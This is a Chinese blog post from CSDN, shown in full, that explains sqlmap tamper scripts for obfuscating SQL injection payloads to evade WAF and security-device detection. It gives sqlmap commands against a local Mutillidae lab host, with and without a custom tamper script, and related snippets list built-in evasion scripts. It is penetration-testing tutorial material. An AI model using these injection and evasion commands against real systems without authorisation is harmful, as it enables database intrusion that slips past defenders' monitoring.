SQLMAP-绕过脚本,混淆脚本

最新推荐文章于 2024-05-22 11:02:40 发布
最新推荐文章于 2024-05-22 11:02:40 发布
阅读量2.1k 收藏 3
点赞数 2
分类专栏: 学海无涯 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38656841/article/details/122466538
版权

sqlmap-tamper 在kali 的储存位置为/usr/share/sqlmap/tamper

 

当我们对于一些特殊的字符做替换的时候我们可以通过tamper中的脚本进行自动化的更改我们发送的payload

                                        这里举个注入的例子

我们正常的攻击求如下:

sqlmap 上普通注入命令如下:
sqlmap -u "http://192.168.1.134/mutillidae/index.php?page=user-info.php&username=asdmin*&password=asdmin*&user-info-php-submit-button=View+Account+Details" --dbs

sqlmap 上普通注入下安全设备检测的结果:

可见攻击的语句没有做过任何的混淆,那么我们如何通过自定义的脚本将里面的一些敏感字替换掉呢?下面的tamper就是为了解决这种混淆的问题产生的。

这里看一个简单地案例:这个是写的一个test.py

 

sqlmap 上加了tamper注入命令如下:

sqlmap -u "http://192.168.1.134/mutillidae/index.php?page=user-info.php&username=asdmin*&password=asdmin*&user-info-php-submit-button=View+Account+Details" --tamper=test.py --dbs

sqlmap 上加了tamper注入下安全设备检测的结果: 

 这样就成功的替换掉了相应的敏感字符。

时光凉春衫薄
关注
专栏目录
进阶的sqlmap用法(参数讲解)
0yst3r ‘s blog
09-21 1万+
进阶的sqlmap用法 参数讲解 1>探测等级: --level 5 --level 5 指的是需要执行的测试等级 一共有5个等级(1-5) 不加 level 时,默认是1 5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。 level=2 http cookie会测试 level=3 http...
sqlmap常用绕过脚本
L_lemo004的博客
10-20 1315
使用方法–tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 between.py分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=” bluec
sqlmap 使用tamper脚本绕过WAF
最新发布
xf3401837266的博客
05-22 1533
sqlmap 使用tamper脚本绕过WAF
渗透测试-sqlmap绕过WAF脚本编写
lza20001103的博客
04-21 4630
渗透测试-sqlmap绕过WAF脚本编写
sqlmap绕过过滤的 tamper 脚本分类汇总
10-19
sqlmap绕过过滤的 tamper 脚本分类汇总,包括所有的数据库的过来脚本汇总
SQLMAP使用教程
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1767
用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库 -u URL,.
关于SQLMAP所有参数的学习笔记
Mi1k7ea
02-27 2万+
本文是对于学习SQLMAP参数的使用的一些笔记,不足之处很多会慢慢改进~ SQLMAP是一款开源的、用于SQL注入漏洞检测及利用的工具,它会检测动态页面中get/post参数、cookie、http头,进行数据榨取、文件系统访问和操作系统命令执行,另外还可以进行Xss漏洞检测。关于其更多的描述这里就不多说了,直接入正题,下面从参数的每个大部分的分类开始讲。 在Kali中已默认安装,其他Li
SQLMAP绕过WAF:全面解析与实战应用
5. 绕过WAF:SQLMAP包含了多种策略来绕过WAF,如使用混淆技术、改变SQL语句结构、使用多阶段注入等,使得攻击更加隐蔽和难以防御。 6. 自动化处理:SQLMAP支持命令行参数,可以定制化测试行为,如设置线程数量、...
sqlmap 常用的注入格式
u012922879的博客
02-27 874
-u #注入点 -r “” # 加载文件注入 sqlmap.py -r “d://a.txt” -f #指纹判别数据库类型 -b #获取数据库版本信息 也可以写成–banner -d参数,直接连接数据库服务器,作为数据库客户端使用而不是通过SQL注入漏洞查询进行,查询速度较快,前提是已知数据库当前的用户名及其密码、IP、端口(3306端口为mysql)和数据库名...
第十一节 Sqlmap注入参数2-01
09-15
Sqlmap 通过 Tamper 脚本绕过 WAF 等防御措施,可以在 tamper 文件夹下找到所有 Sqlmap 自带的 Tamper 脚本。例如,使用以下命令可以设置 Tamper 脚本: `sqlmap.py -u ...
SQLMap绕过脚本tamper(from 《Web安全攻防渗透测试实战指南》)
coderge's CSDN Blog.
09-06 1355
目录 1 tamper作用 2 tamper格式 3 检测是否有IDS/IPS/WAF 1 tamper作用 SQLMap在默认情况下除了使用CHAR()函数防止出现单引号,没有对注入的数据进行修改,读者还可以使用 --tamper参数对数据做修改来绕过WAF等设备,其中大部分脚本主要用正则模块替换攻击载荷字符编码的方式尝试绕过WAF的检测规则,命令如下所示。 sqlmap.py XXXXX --tamper "模块名" SQLMap1.4.9.3 本版本目前官方提供63个绕过脚本,下面是一
SQLMAP自带的绕过脚本 --tamper
kuxing100的专栏
05-05 1144
首先这个文章我是转来的  http://www.chuhades.com/post/19590b_4cc51f  确实很实用,就当记录一下吧,方便日后查询。  apostrophemask.py UTF-8编码  Example:  * Input: AND '1'='1'  * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
【sql注入-WAF绕过】编写sqlmaptamper进行sql注入
06-29 6391
【特征】特殊符号+十六进制格式
sqlmap的使用 ---- 自带绕过脚本tamper
热门推荐
wkend的博客
09-15 4万+
sqlmap在默认的的情况下除了使用char()函数防止出现单引号,没有对注入的数据进行修改,还可以使用–tamper参数对数据做修改来绕过waf等设备。 0x01 命令如下 sqlmap -u [url] --tamper [模块名] sqlmap绕过脚本在目录usr/share/golismero/tools/sqlmap/tamper下 目前sqlmap 1.2.9版本共有37...
WEB漏洞-SQL注入-利用SQLMAP工具绕过WAF
ran的博客
01-25 3186
此时可以在SQLMAP的命令里加入“--random-agent”参数,此参数的作用是使User-Agent后面的值按照其字典随机出现。因此就需要我们自己来写脚本,在自己写脚本的过程中可以参考“tamper”下的脚本,可以对里面的脚本进行修改。在漏洞防护规则里可以看到包含一种名为“工具拦截”的检测类型,当其发现是使用sqlmap工具时,就会进行拦截。但是这些默认的脚本必然是不能绕过我们现在常见的一些WAF的(可以绕过一些比赛的拦截规则,如CTF比赛等)。可以看到此时网站可以正常访问,可以进行正常注入。
【Python脚本SQLMapTamper脚本——绕过网站自身
weixin_55205599的博客
10-17 477
实现SQL注入漏洞的检测与利用的自动化处理,其自带的Tamper脚本可以帮助绕过IDS/WAF的检测。
定制SQLmap和WAF绕过
weixin_58954236的博客
09-23 1256
以sqli-lab第26关为例输入?id=1’ --+,报错字符型注入考虑闭合问题,输入?id=1’ and '1,但是回显中and和空格消失了,可知and和空格被过滤了因为and和or被过滤考虑使用双写绕过手段,空格使用其他字符进行代替例如%0a或%a0使用SQLmap扫描,结果无SQL注入漏洞可是明明手动测试存在SQL注入漏洞但是SQLmap竟然没有扫描出来,是因为SQLmap在进行注入的时候没有合适的绕过手法,被过滤掉了,那么就需要我们对SQLmap发送的payload进行编码。
sqlmap绕过过滤的tamper脚本分类汇总
我不是大牛
07-04 1083
SQLMap tamper脚本绕过WAF与渗透测试指南
"SQLMapTamper文档详细介绍了如何使用SQLMaptamper脚本绕过Web应用程序的敏感字符过滤和WAF规则,以便进行渗透测试。文档涵盖了tamper脚本的作用、用法以及针对不同数据库类型的tamper脚本选择。" 在网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

时光凉春衫薄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值